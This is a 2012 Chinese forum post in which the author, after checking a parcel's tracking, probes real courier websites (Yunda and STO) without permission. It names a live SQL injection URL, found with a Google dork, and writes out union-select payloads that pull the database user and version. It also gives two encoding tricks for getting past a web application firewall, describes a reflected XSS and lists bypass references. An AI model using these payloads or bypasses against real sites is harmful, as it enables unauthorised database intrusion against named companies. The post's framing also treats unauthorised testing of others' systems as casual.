各大快递网站的渗透安全测试

楼主^#

更多发布于：2012-11-16 11:49

[] 1


	0x01 事起有因双十一在淘宝上买了几件衣服，昨天收到短信说快递已发。于是查了下物流订单详情，然后顺便手贱了下。 0x02 安全问题 A 韵达 ------- 查看订单的时候，看到有php页面，就google了一把：site:yundaex.com inurl:php? ，还很发现了注入点。注入点： http://www.yundaex.com/fuwuwangdian_list.php?shi=027 数据库：图片：20121116104257235.jpg B 申通 --------- 申通的主页上面直接有新闻，而且都是asp的动态页面，就加了个单引号，结果就报错了。图片：20121116104257700.jpg 很明显又是一个注入漏洞。然后习惯性的and 1=1，and 1=2，然后就出现了不常见的页面，可以证明是有waf在作怪。不过该waf没有组织order by，通过他可以知道前面的查询有8个字段。现在介绍两种绕过该waf的方法： Urlencode编码 -------------------- 将and 1=2 union select 1,user(),3,4,5,6,version(),8 全部字符都进行urlencode编码为：%61%6e%64%20%31%3d%32%20%75%6e%69%6f%6e%20%73%65%6c%65%63%74%20%31%2c%75%73%65%72%28%29%2c%33%2c%34%2c%35%2c%36%2c%76%65%72%73%69%6f%6e%28%29%2c%38，然后提交，数据出来了。图片：20121116104257605.jpg 解释：即使将select等关键字url编码后，当请求的链接到达服务端后，服务端容器会先给转码的，然后再交给asp脚本处理。所以在源代码审计时经常会找urldecode等函数，因为这样可能利用url双编码来绕过防注入程序的处理。 Asp环境添加% -------------------- 将and 1=2 union select 1,user(),3,4,5,6,version(),8变为：an%d 1=2union selec%t 1,user(),3,4,5,6,version(),8，然后提交，数据又出来了。图片：20121116104258269.jpg 解释：IIS下的asp.dll文件在对asp文件后参数串进行url解码时，会直接过滤掉09-0d（09是tab键,0d是回车）、20（空格）、%(下两个字符有一个不是十六进制)字符。 0x03 还是那个waf 申通这个waf当输入有特殊字符时，会将query字符串输出来。所以这里就会形成一个xss。图片：20121116104258952.jpg 不过这个xss很yy，因为这是在代理下提交的，如果用浏览器的，浏览器会先给编码。 0x04 关于waf的资料 http://www.defcon.org/images/defcon-16/dc16-presentations/defcon-16-henrique.pdf Playing with web Application Firewalls http://pauldotcom.com/2012/01/real-world-waf-detection-and-b.html Real World WAF Detection and Bypass Made Easy https://www.owasp.org/images/0/0a/Appseceu09-Web_Application_Firewalls.pdf Web Application Firewalls: What the vendors do NOT want you to know http://hackerstown.com/showthread.php?tid=20228 [TUT]basic WAF bypassing and intrusiondetection [tut] http://www.101hacker.com/2011/11/sql-injections-part-5-bypassing-waf.html SQL InjectionPart 5 – Bypassing WAF http://ptsecurity.com/download/PT-devteev-CC-WAF-ENG.pdf Methods to Bypass a Web ApplicationFirewall http://www.nethemba.com/bypassing-waf.pdf Bypassing Web Application Firewalls (WAFs) http://websec.ca/blog/view/Bypassing_WAFs_with_SQLMap Bypassing_WAFs_with_SQLMap Web Application Firewalls: Detection,Bypassing and Exploitation http://www.andlabs.org/whitepapers/Split_and_Join.pdf Split_and_Join http://kyle-sandilands.com/?p=1995 http://www.sectechno.com/2010/05/23/detecting-bypassing-web-application-firewalls-part-1/ DETECTING ; BYPASSING WEB APPLICATIONFIREWALLS (PART 1) https://www.sans.org/security-training/web-application-firewall-filter-bypass-day-4-15936-cid Web Application Firewall and Filter Bypass http://www.darkreading.com/security/news/217400819/researchers-hack-web-application-firewalls.html 还有safe3和blackhat上面那个协议方面绕过的文章，可以自己找下。 ….. 欢迎补充。 0x05 问题说明这几个漏洞应该都存在很长时间了，而且估计千人日了。不过这里只做说明，重点是waf。